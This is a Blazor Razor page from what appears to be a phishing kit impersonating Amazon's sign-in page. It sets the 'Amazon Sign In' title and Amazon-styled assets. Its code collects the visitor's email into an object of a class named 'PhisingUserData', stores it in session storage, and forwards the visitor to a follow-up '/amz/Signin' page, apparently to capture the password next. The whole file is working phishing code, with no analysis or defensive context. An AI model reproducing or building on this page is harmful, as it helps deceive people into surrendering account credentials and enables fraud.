@page "/amz/Index"
@layout AmzLayout

@using BlazorApp.Data 

@inject NavigationManager navigationManager
@inject Blazored.SessionStorage.ISessionStorageService _session


<head>
        <meta charset="utf-8">
        <title dir="ltr">Amazon Sign In</title>
        <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no" />
        <link rel="icon" href="style/img/icon.png">
        <link rel="shortcut icon" href="style/img/icon.png">
        <link rel="stylesheet" href="amz/style3.css">
        <link rel="stylesheet" href="amz/style2.css">
        <link rel="stylesheet" href="amz/style1.css">
        <style>
            .error {
                color: red
            }
            
            #zwimel {
                width: 100%;
                height: 100%;
                top: 0px;
                left: 0px;
                position: fixed;
                display: block;
                opacity: .9;
                background-color: #fff;
                z-index: 99;
                text-align: center;
            }
        </style>
    </head>

    <Login/>

    @inject ILogger<Index> logger
@code {



    public string mail =  "";
    public string InputValue { get; set; }

    public void nextpage()
    {
        setSessionUser();
        try
        {
            navigationManager.NavigateTo($"/amz/Signin");
                        logger.LogDebug("Page Changed!");


        }catch(Exception e)
        {
            logger.LogError(e.ToString());
        }
    }

    private void setSessionUser(){
        InputValue = mail;

        var user = new PhisingUserData();
        user.Email = InputValue;

        _session.SetItemAsync("SessionUser", user);

        logger.LogInformation("Session Set !");
    }

}
